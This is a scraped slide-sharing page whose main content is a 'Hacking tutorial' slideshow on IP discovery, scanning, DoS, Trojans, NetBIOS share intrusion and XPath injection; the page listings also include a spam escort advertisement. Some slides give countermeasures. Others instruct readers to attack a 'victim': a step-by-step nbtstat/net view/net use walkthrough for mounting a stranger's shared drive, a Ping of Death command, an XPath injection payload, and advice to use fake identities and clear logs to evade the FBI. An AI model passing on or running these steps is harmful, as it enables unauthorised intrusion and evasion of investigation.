What is a Digital Signature? | How Digital Signature work?
What is a Digital Signature? | How Digital Signature work?What is a Digital Signature? | How Digital Signature work?
What is a Digital Signature? | How Digital Signature work?MSA Technosoft
 
Cascading Style Sheets - CSS - Tutorial
Cascading Style Sheets - CSS - TutorialCascading Style Sheets - CSS - Tutorial
Cascading Style Sheets - CSS - TutorialMSA Technosoft
 
www | HTTP | HTML - Tutorial
www | HTTP | HTML - Tutorialwww | HTTP | HTML - Tutorial
www | HTTP | HTML - TutorialMSA Technosoft
 
Responsive Web Design | Website Designing
Responsive Web Design | Website DesigningResponsive Web Design | Website Designing
Responsive Web Design | Website DesigningMSA Technosoft
 
BFS, Breadth first search | Search Traversal Algorithm
BFS, Breadth first search | Search Traversal AlgorithmBFS, Breadth first search | Search Traversal Algorithm
BFS, Breadth first search | Search Traversal AlgorithmMSA Technosoft
 
MIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITS
MIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITSMIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITS
MIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITSMSA Technosoft
 
eCommerce | Electronic Commerce
eCommerce | Electronic CommerceeCommerce | Electronic Commerce
eCommerce | Electronic CommerceMSA Technosoft
 
Digital Marketing | Internet Marketing | Social Networking
Digital Marketing | Internet Marketing | Social NetworkingDigital Marketing | Internet Marketing | Social Networking
Digital Marketing | Internet Marketing | Social NetworkingMSA Technosoft
 
Cascading Style Sheet | CSS
Cascading Style Sheet | CSSCascading Style Sheet | CSS
Cascading Style Sheet | CSSMSA Technosoft
 
Data communication and computer networks | Network Topologies
Data communication and computer networks | Network TopologiesData communication and computer networks | Network Topologies
Data communication and computer networks | Network TopologiesMSA Technosoft
 

More from MSA Technosoft (14)

Computer networks-4
Computer networks-4Computer networks-4
Computer networks-4
 
Computer networks-3
Computer networks-3Computer networks-3
Computer networks-3
 
Computer networks-2
Computer networks-2Computer networks-2
Computer networks-2
 
Computer networks-1
Computer networks-1Computer networks-1
Computer networks-1
 
What is a Digital Signature? | How Digital Signature work?
What is a Digital Signature? | How Digital Signature work?What is a Digital Signature? | How Digital Signature work?
What is a Digital Signature? | How Digital Signature work?
 
Cascading Style Sheets - CSS - Tutorial
Cascading Style Sheets - CSS - TutorialCascading Style Sheets - CSS - Tutorial
Cascading Style Sheets - CSS - Tutorial
 
www | HTTP | HTML - Tutorial
www | HTTP | HTML - Tutorialwww | HTTP | HTML - Tutorial
www | HTTP | HTML - Tutorial
 
Responsive Web Design | Website Designing
Responsive Web Design | Website DesigningResponsive Web Design | Website Designing
Responsive Web Design | Website Designing
 
BFS, Breadth first search | Search Traversal Algorithm
BFS, Breadth first search | Search Traversal AlgorithmBFS, Breadth first search | Search Traversal Algorithm
BFS, Breadth first search | Search Traversal Algorithm
 
MIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITS
MIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITSMIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITS
MIS ( Management Information System ) | DEFINITION, IMPORTANCE & BENIFITS
 
eCommerce | Electronic Commerce
eCommerce | Electronic CommerceeCommerce | Electronic Commerce
eCommerce | Electronic Commerce
 
Digital Marketing | Internet Marketing | Social Networking
Digital Marketing | Internet Marketing | Social NetworkingDigital Marketing | Internet Marketing | Social Networking
Digital Marketing | Internet Marketing | Social Networking
 
Cascading Style Sheet | CSS
Cascading Style Sheet | CSSCascading Style Sheet | CSS
Cascading Style Sheet | CSS
 
Data communication and computer networks | Network Topologies
Data communication and computer networks | Network TopologiesData communication and computer networks | Network Topologies
Data communication and computer networks | Network Topologies
 

Recently uploaded

AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
Karra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptxKarra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptxAshokKarra1
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4MiaBumagat1
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17Celine George
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)cama23
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPCeline George
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Celine George
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Celine George
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYKayeClaireEstoconing
 
Science 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxScience 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxMaryGraceBautista27
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSJoshuaGantuangco2
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designMIPLM
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfErwinPantujan2
 
Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parentsnavabharathschool99
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Mark Reed
 
FILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinoFILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinojohnmickonozaleda
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Recently uploaded (20)

AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Karra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptxKarra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptx
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERP
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
 
Science 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxScience 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptx
 
YOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptx
YOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptxYOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptx
YOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptx
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
 
Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parents
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)
 
FILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinoFILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipino
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 

Hacking tutorial

  • 1. HACKING In this video we are going to discuss Introduction to Hacking History of Hacking The Hacker attitude Basic Hacking skills Hacking Premeasured IP Address Finding IP Address IP Address dangers & Concerns
  • 2. What is Hacking? Hacking refers to an array of activities which are done to intrude some one else’s personal information space so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
  • 3. A Brief History of Hacking • 1980s - Cyberspace coined -414 arrested -Two hacker groups formed -2600 published • 1990s -National Crackdown on hackers -Kevin Mitnick arrested -Microsoft’s NT operating system pierced
  • 4. A Brief History of Hacking • 2001 – In one of the biggest denial-of-service attack, hackers launched attacks against eBay, Yahoo!, CNN.com., Amazon and others. • 2007 – Bank hit by “biggest ever” hack. Swedish Bank, Nordea recorded nearly $1 Million has been stolen in three months from 250 customer account.
  • 5. The Hacker Attitude The world is full of fascinating problems waiting to be solved Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. To be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. Nobody should ever have to solve a problem twice Creative brains are a valuable, limited resource. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
  • 6. The Hacker Attitude Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work Freedom is good Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by Becoming a hacker will take intelligence, practice, dedication, and hard work.
  • 7. Basic Hacking Skills Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, you cant do hacking. Get one of the open-source Unix's and learn to use and run it The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal machine, and run it. Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers.
  • 8. Hacking Premeasured When you start hacking the first thing you need to do is: to make sure the victim will not find out your real identity. So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware ! The best thing to do is using a dialup connection that has a variable IP address. Be smart, when you signup for a internet dialup connection use a fake name and address. When hacking never leave traces of your hacking attempts, clear log files and make sure you are not monitored. So use a good firewall that keeps out retaliation hacking attempts of your victim.
  • 9. IP Addresses Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network. An IP Address is a 32-bit address which is divided into four fields of 8-bits each. For Example, 203.94.35.12 All data sent or received by a system will be addressed from or to the system. An attacker’s first step is to find out the IP Address of the target system.
  • 10. IP Addresses: Finding out an IP Address A remote IP Address can easily be found out by any of the following methods:  Through Instant Messaging Software  Through Internet Relay Chat  Through Your website  Through Email Headers
  • 11. Finding an IP Address via Instant Messengers  Case: If you are chatting on messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend’s system: Your System------Chat Server---- Friend’s System Friend’s System---------Chat Server------- Your System Thus in this case, you first have to establish a direct connection with your friend’s computer by either sending him a file or by using the call feature. Then, go to MSDOS or the command line and type: C:>netstat -n This command will give you the IP Address of your friend’s computer.
  • 12. Finding an IP Address via Instant Messengers Countermeasures Do not accept File transfers or calls from unknown people Chat online only after logging on through a Proxy Server. A Proxy Server acts as a buffer between you and the un-trusted network known as the Internet, hence protecting your identity. Case: Your System-----Proxy------Chat Server------Friend’s System Some good Proxy Servers are: Wingate (For Windows Platform) Squid (For Unix Platforms)
  • 13. Finding an IP Address via your website  One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code. Countermeasures  One should surf the Internet through a Proxy Server.  One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example, www.anonymizer.com
  • 14. Finding an IP Address via Email Headers  Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.  A Typical excerpt of such a Header of an email sent from a Hotmail account is: Return-Path: <XXX@hotmail.com> Received: from hotmail.com by sbcglobal.net (8.9.1/1.1.20.3/13Oct08-0620AM) id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST) Message-ID: <20000123133014.34531.qmail@hotmail.com> Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, Sun, 12 OCT 2008 05:30:14 PST X-Originating-IP: [202.xx.109.174]
  • 15. IP Addresses: Dangers & Concerns Dangers & Concerns  DOS Attacks  Disconnect from the Internet  Trojans Exploitation  Geographical Information  File Sharing Exploits
  • 16. HACKING • Network Hacking • General Hacking Methodology • Port Scanning • ICMP Scanning
  • 18. General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 2. Gathering Information on the target system. 3. Finding a possible loophole in the target system. 4. Exploiting this loophole using exploit code. 5. Removing all traces from the log files and escaping without a trace.
  • 19. Port Scanning: An Introduction Port Scanning means to scan the target system in order to get a list of open ports (i.e. ports listening for connections) and services running on these open ports. Port Scanning is normally the first step that an attacker undertakes. Is used to get a list of open ports, services and the Operating System running on the target system. Can be performed easily by using different methods. Manual Port Scanning can be performed using the famous ‘Telnet’ program. It is often the first tell tale sign, that gives an attacker away to the system administrator.
  • 20. Port Scanning : TCP Connect Scanning  Port Scanner establishes a full 3-way TCPIP Handshake with all ports on the remote system. The regular 3-way TCPIP Handshake has been depicted below: 1. Client---------SYN Packet------------- Host 2. Host-----------SYNACK Packet-------- Client 3. Client----------ACK Packet--------------- Host  Accurate and Fastest Port Scanning Method. Detection and Countermeasures  Initialization and Termination of Connections on multiple ports from the same remote IP Address.  Only monitoring can be done. No effective countermeasure available, without compromising on the services offered by the system.
  • 21. Port Scanning: Security Threats Port Scanning is commonly used by computer attackers to get the following information about the target system:  List of Open Ports  Services Running  Exact Names and Versions of all the Services or Daemons.  Operating System name and version All this information can collectively prove to be invaluable when the attacker is actually trying to infiltrate into the target system.
  • 22. Port Scanning : Major Tools Available Some of the best and the most commonly used Port Scanners are:  Nmap  Superscan  Hping Common Features of all above Port Scanners:  Very Easy to Use  Display Detailed Results The easy usability and the detailed information reports generated by popular port scanners has led to an alarming increase in the number of script kiddies.
  • 23. Port Scanning: Counter-Attacks Strategies Although, it is impossible to stop clients from Port Scanning your network, however, it is advisable to take all possible measures against possible attackers. Some useful Anti-Port Scanning software available are:  Scanlogd (A Unix based Port Scan Detector & Logger)  BlackICE (A Windows based Port Scan Detector & Logger)  Snort: A packet sniffer cum IDS.  Abacus Port sentry: Capable of Detecting both normal and stealth port scanning attempts. Other than the above tools, it is always advisable to disable as many services as possible. In other words, one should try to close as many ports as possible, without compromising on the services offered by that system.
  • 24. ICMP Scanning: An Introduction  The Internet Control Message Protocol (ICMP) is the protocol used for reporting errors that might have occurred while transferring data packets over networks  Extremely Useful in Information Gathering.  Originally, designed for network diagnosis and to find out as to what went wrong in the data communication.  Can be used to find out the following:  Host Detection  Operating System Information  Network Topography Information  Firewall Detection
  • 25. ICMP Scanning: Host Detection Techniques  ICMP Host Detection technique ‘ping’ command or utility.  The ‘ping’ utility can be used to determine whether the remote host is alive or not.  The ping command can be used by the attacker for the following purposes:  Host Detection Purposes  To clog up valuable network resources by sending infinite ‘Echo request’ ICMP messages.  Firewall detection
  • 26. ICMP Scanning: Host Detection-Ping Example  Below is sample output of a PING command executed on a Windows machine: C:WINDOWS>ping www.yahoo.com   Pinging www.yahoo-ht3.akadns.net [69.147.96.15] with 32 bytes of data:   Reply from 69.147.96.15 : bytes=32 time=163ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=185ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=153ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=129ms TTL=61 ……………
  • 27. HACKING Various types of attacks Denial of Services attacks (DOS Attacks) Threat from Sniffing and Key Logging Trojan Attacks IP Spoofing Buffer Overflows All other types of Attacks
  • 28. Various Types of Attacks There are an endless number of attacks, which a system administrator has to protect his system from. However, the most common ones are:  Denial of Services attacks (DOS Attacks)  Threat from Sniffing and Key Logging  Trojan Attacks  IP Spoofing  Buffer Overflows  All other types of Attacks
  • 29. Denial of Services (DOS) Attacks  DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system.  In other words, a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users.  There are numerous types of Denial of Services Attacks or DOS Attacks.
  • 30. DOS Attacks: Ping of Death Attack The maximum packet size allowed to be transmitted by TCPIP on a network is 65 536 bytes. In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCPIP, is sent to the target system. As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs. This attack can easily be executed by the ‘ping’ command as follows: ping -l 65540 hostname
  • 31. DOS Attacks: SMURF Attacks  In SMURF Attacks, a huge number of Ping Requests are sent to the Target system, using Spoofed IP Addresses from within the target network.  Due to infinite loops thus generated and due to the large number of Ping Requests, the target system will crash, restart or hang up.
  • 32. Threats from Sniffers and Key Loggers  Sniffers: capture all data packets being sent across the network in the raw form. Commonly Used for:  Traffic Monitoring  Network Trouble shooting  Gathering Information on Attacker.  For stealing company Secrets and sensitive data.  Commonly Available Sniffers  tcpdump  Ethereal  Dsniff
  • 33. Threats from Sniffers: Working & Countermeasures  Working Sniffers work along with the NIC, capturing all data packets in range of the compromised system.  Countermeasures  Switch to Switching Networks. (Only the packets meant for that particular host reach the NIC)  Use Encryption Standards like SSL, SSH, IPSec.
  • 34. Threats from Key Loggers  Key loggers: Record all keystrokes made on that system and store them in a log file, which can later automatically be emailed to the attacker.  Countermeasures  Periodic Detection practices should be made mandatory. A Typical Key Logger automatically loads itself into the memory, each time the computer boots.  Thus, the start up script of the Key Logger should be removed.
  • 35. Trojan Attacks Trojans: act as a RAT or Remote Administration Tool, which allow remote control and remote access to the attacker. Working: 1. The Server Part of the Trojan is installed on the target system through trickery or disguise. 2. This server part listens on a predefined port for connections. 3. The attacker connects to this Server Part using the Client part of the Trojan on the predefined port number. 4. Once this is done, the attacker has complete control over the target system.
  • 36. Trojan Attacks: Detection and Countermeasures  Detection & Countermeasures  Port Scan your own system regularly.  If you find a irregular port open, on which you usually do not have a service running, then your system might have a Trojan installed.  One can remove a Trojan using any normal Anti-Virus Software.
  • 37. Hacking • Live example Hacking NETBIOS
  • 38. Live Example Hacking NetBIOS What is NetBIOS? NetBIOS (Network Basic Input/output System) was originally developed by IBM as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for acessing networking services. Step 1: Get a IP (range) scanner. (Recommended Superscanner). Scan the victim's IP on TCP/IP port 139.
  • 39. Live Example Hacking NetBIOS: Continue  Step 2: Open a DOS prompt. Go to Start-> Run. Type CMD and press OK. This is what you see: c:windows> This is what you need to type down: Replace 255.255.255.255 with the victims IP address. c:windows>nbtstat -a 255.255.255.255
  • 40. Live Example Hacking NetBIOS: Continue  Step 2: Continue If you see this, you are in: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------------------------- User <00> UNIQUE Registered Workgroup <00> GROUP Registered User <03> UNIQUE Registered User <20> UNIQUE Registered MAC Address = xx-xx-xx-xx-xx-xx If you don't get the number <20>. The victim disabled the File And Printer Sharing, find a another victim
  • 41. Live Example Hacking NetBIOS: Continue Step 3: Type down: c:windows>net view 255.255.255.255 If the output is like this: Shared resources at 255.255.255.255 ComputerNameGoesHere Share name Type Used as Comment ------------------------------------------------------------ CDISK Disk xxxxx xxxxx The command completed successfully. "DISK" shows that the victim is sharing a Disk named as CDISK
  • 42. Live Example Hacking NetBIOS: Continue Step 4: Type down: You can replace x: by anything letter you want but not your own drive letters. CDISK is the name of the shared hard drive. c:windows>net use x: 255.255.255.255CDISK If the command is successful we will get the confirmation. The command was completed successfully Now open windows explorer or just double click on the My Computer icon on your desktop and you will see a new network drive X:> . Now your are a small time hacker. Good luck.
  • 43. Hacking • Internet application security • Internet application hacking statistics • Web application hacking reasons • General Hacking Methods • Vulnerability • Hacking techniques • XPath Injection • FAQs
  • 45. Internet Application Hacking Statistics • WHID (Web Hacking Incident Database) annual report for 2007 67% percent of the attacks in 2007 were "for profit" motivated. And it targeted the Web- Applications. • Acunetix, a leading vendor of web application security solutions, revealed that on average 70% of websites are at serious and immediate risk of being hacked. Every 1500 lines of code has one security vulnerability. (IBM LABS) • 3 out of 4 websites are Vulnerable to attack. (Gartner Report) • Most popular attacks are against web server ( incident.org)
  • 46. Why So Many Attacks on Web Application???  Mobile Application, Browser Application.  Internet data is shared.  24 / 7
  • 47. Web Application are Three-tier Application Three-tier application
  • 49. General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 2. Gathering Information on the target system. 3. Finding a possible loophole in the target system. 4. Exploiting this loophole using exploit code. 5. Removing all traces from the log files and escaping without a trace.
  • 50. Fundamental Methodology to do any Web-Application Assessment Foot printing Discovery of Web application Profiling Getting Real Attack Points Exploit the system Finding the defend mechanism and approach for them
  • 51. Start With Foot Printing IP Address and Port as start point for assessment- MYTH What if IP address is multi-hosted? One IP can have more application to assess. Finding web application running on domain. HOW????
  • 52. 2-Ways Host Foot printing Domain Foot printing. Both focus on Web application. Tools and method. LETS CHECK IT OUT!!!!!
  • 54. Why Vulnerable? Poor Web Application coding Insecure deployment of web application Insufficient input validation No web traffic filtering Web application attributes are not guarded well. For example Query String.
  • 55. Web Application Security Consortium (WASC) Statistics
  • 57. Checking Vulnerabilities  http://www.acunetix.com/cross-site-scripting/Copy-scanner.htm  Once you have vulnerabilities known, Out of the 100,000 websites scanned by Acunetix WVS, 42% were found to be vulnerable to Cross Site Scripting. XSS is extremely dangerous and the number of the attacks is on the rise. Hackers are manipulating these vulnerabilities to steal organizations’ sensitive data. Can you afford to be next?  Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data
  • 58. Classes of Attacks  Authentication The Authentication section covers attacks that target a web site's method of validating the identity of a user, service or application.  Authorization The Authorization section covers attacks that target a web site's method of determining if a user, service, or application has the necessary permissions to perform a requested action.  Client-side Attacks The Client-side Attacks section focuses on the abuse or exploitation of a web site's users.  Command Execution The Command Execution section covers attacks designed to execute remote commands on the web site. All web sites utilize user-supplied input to fulfill requests.  Logical Attacks The Logical Attacks section focuses on the abuse or exploitation of a web application's logic flow.
  • 59. Attack Techniques (Hacking Techniques)  Brute Force A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key  Cross-site Scripting Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser.  SQL Injection SQL Injection is an attack technique used to exploit web sites that construct SQL statements from user-supplied input.  XPath Injection XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
  • 60. XPath Injection <?xml version="1.0" encoding="utf-8" ?> <orders> <customer id="1"> <name>Bob Smith</name> <email> bob.smith@bobsmithinc.com </email> <creditcard>1234567812345678</creditcard> <order> <item> <quantity>1</quantity> <price>10.00</price> <name>Sprocket</name> </item> <item> <quantity>2</quantity> <price>9.00</price> <name>Cog</name> </item> </order> </customer> ... </orders>
  • 61. XPath Query of Previous Code The XPath query that the application performs looks like this string query = "/orders/customer[@id='" + customerId + "']/order/item[price >= '" + priceFilter + "']";
  • 62. Hacking XPath Injection Query string query = "/orders/customer[@id=''] | /* | /foo[bar='']/order/item[price >= '" + priceFilter + "']";
  • 63. FAQs Q) What are general hacking method? Ans: Identify the target system. Gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace Q) If we have IP address and a port, we can do web assessment for all web application. (Agree/Disagree) Give Reason. Ans: Disagree What if IP is hosted in multi-hosted framework?